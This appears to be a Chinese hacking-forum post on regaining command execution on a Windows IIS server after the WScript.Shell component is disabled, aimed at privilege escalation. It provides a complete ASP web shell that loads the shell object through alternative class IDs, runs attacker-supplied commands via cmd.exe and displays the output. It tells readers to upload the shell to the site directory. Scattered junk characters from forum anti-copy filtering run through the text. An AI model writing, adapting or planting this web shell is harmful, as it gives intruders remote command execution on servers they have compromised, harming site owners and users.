wscript.shell删除解决办法

admin

可能有很多人，看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
% u7 u6 Q4 i/ m* b" ]1 `一般当闭上面组件时，你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
要想让运行命令可以试试这种方法，成功率为五五之数。
" L. b1 Q3 u4 ?9 ]把下面代码复制：
7 Z/ l% S  ]( R<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
: y& p! T$ n* h% M<%if err then%>
3 d- H$ U. m( b2 m" Y7 E! n( w<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<%
end if
: p8 O6 Q. n9 @( K# cresponse.write("<textarea readonly cols=80 rows=20>")
On Error Resume Next
- l$ ^, e5 `4 E' Vresponse.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall
response.write("</textarea>")
+ a! H1 R9 Y! l9 b) ?response.write("<form method='post'>")
response.write("<input type=text name='c' size=60><br>")
response.write("<input type=submit value='执行'></form>")
% p3 p6 V" D* B) L/ W%>
$ ]& V6 N0 _) i
; o! I, J) q& Q保存为一个asp文件，然后传到网站目录上去
1 R: h" B9 J& q3 x/ O运行的时候可能会出现两个问题，第一是运行了为什么运行不了命令，这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
9 F7 @* j$ B' I" u0 Y& |0 n- h! g, P. v我用此成功运行过cacls命令。

" q# J$ @5 }% V4 ~第二那就是运行时出错，可能限制某些代码执行